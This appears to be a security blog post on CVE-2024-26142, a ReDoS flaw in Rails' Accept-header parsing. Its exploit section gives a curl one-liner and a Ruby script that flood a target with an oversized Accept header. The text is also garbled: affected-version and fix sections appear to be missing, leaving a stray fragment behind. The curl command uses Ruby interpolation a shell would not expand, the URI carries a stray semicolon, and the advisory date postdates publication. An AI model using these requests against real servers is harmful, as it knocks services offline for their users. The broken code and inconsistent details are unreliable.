CVE-2024-26142 - How a Rails Accept Header Bug Could Slow Down Your App (With Exploit Example)

Recently, a new security vulnerability was discovered in Rails, the popular Ruby web application framework. Tracked as CVE-2024-26142, this bug affects how Action Dispatch parses Accept headers and can let attackers slow down your server with certain requests — a classic case of ReDoS (Regular Expression Denial of Service). In this post, we'll explain how this vulnerability works, who is affected, how to fix it, and show a real exploit example.

Ruby versions affected: Only Ruby < 3.2 is vulnerable. Ruby 3.2+ has built-in mitigations.

This bug lives in the code that parses HTTP Accept headers, which means it can be triggered just by sending a request with a specially-crafted header to any Rails app! Such a request can tie up server resources, potentially bringing down your website.

Why Does This Happen?

Rails’ Accept header parsing uses a regular expression to split and sort media types. If an attacker sends a very long and complex header, this regex takes a very long time to process. As a result, your server’s CPU resources are eaten up handling these requests instead of serving real users. This is a perfect real-world example of ReDoS.

Or you are on Ruby 3.2 or newer

Note: All Rails apps that run on cloud or public servers can be reached by attackers, so you should patch as soon as possible.

How the Exploit Works

Let’s see what an exploit might look like. It’s surprisingly simple. The attacker would send a request with an intentionally nasty Accept header:

Sample Exploit (Malicious Script Snippet)

# This uses curl as a proof of concept.
curl -H "Accept: #{"a/".ljust(10_000, 'a,')}a" http://your-rails-app.com/

Or, in Ruby

require 'net/http'

# Build a header string that will cause slow parsing
long_header = "a/" + ("a," * 10_000) + "a"

uri = URI("https://your-rails-app.com/";)
req = Net::HTTP::Get.new(uri)
req['Accept'] = long_header

Net::HTTP.start(uri.hostname, uri.port, use_ssl: uri.scheme == 'https') do |http|
  http.request(req)
end

If the target server is vulnerable, its CPU will spike as it tries to process the crafted header, slowing responses for everyone or even going offline.

References & Further Reading

- CVE-2024-26142 on MITRE
- Rails Security Advisory (2024-03-25)
- Bugfix Pull Request
- Understanding ReDoS

Final Thoughts

If you're running a public Rails app, you should check your version now. Even if you haven't seen slowdowns or attacks, it's smart to patch.

Stay secure out there! 🚀

*Original post written in plain language by an independent security analyst for the 2024 Rails user community.*

Timeline

Published on: 02/27/2024 16:15:46 UTC
Last modified on: 02/28/2024 14:07:00 UTC